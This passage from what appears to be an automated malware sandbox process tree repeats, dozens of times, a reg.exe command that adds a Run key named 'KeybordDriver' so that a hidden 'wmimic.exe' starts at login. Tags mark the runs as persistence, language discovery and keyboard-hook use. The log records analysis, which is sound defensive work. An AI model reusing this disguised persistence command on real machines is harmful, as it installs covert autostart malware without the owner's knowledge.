- Adds Run key to start application
PID:28244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:29668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:30096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:30508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:30800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:31484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:31616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:32024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:32164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:32420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:32620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:32720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:33000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:33076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:33380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:33272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:33616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:33820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:34260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:34844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:35268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:35740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:36040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:36180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:36368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:36700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:36560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:36668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:37084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:37220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:37400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:37592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:37916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:38568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:39416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:39584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:39736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:4232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:5168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:40112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:41352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:10748 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:10460
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:9948 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:9956
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:9036
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:9004
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:19356 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:19200
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:3448 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:4920
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:17384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:16840 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:16960
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:1500
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:2004
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:16392 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:16304
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:16148
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:8960
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:15840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:15532 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:15588
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:14548
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:14588
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- System Location Discovery: System Language Discovery
PID:13612 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:13588
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:13144 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:13364
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:12340 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:12324
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:11728 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:11560
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:12200 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of SetWindowsHookEx
PID:12256
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6092 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:6024
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:5084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:6188 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:6196
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- System Location Discovery: System Language Discovery
PID:6640 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:6724
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:6728
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of SetWindowsHookEx
PID:7024
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- System Location Discovery: System Language Discovery
PID:21908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:22676 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:22628
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:21348 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:22440
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:21240 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:21192
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:21488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:25248 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of SetWindowsHookEx
PID:25260
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:26856 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:26796
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:26908 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:13328
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:27148 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:27060
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:28092 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:28176
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:30104
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:30464
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:31912 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:31924
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:29724 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:33292
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:34216
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:33680
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:35892 -
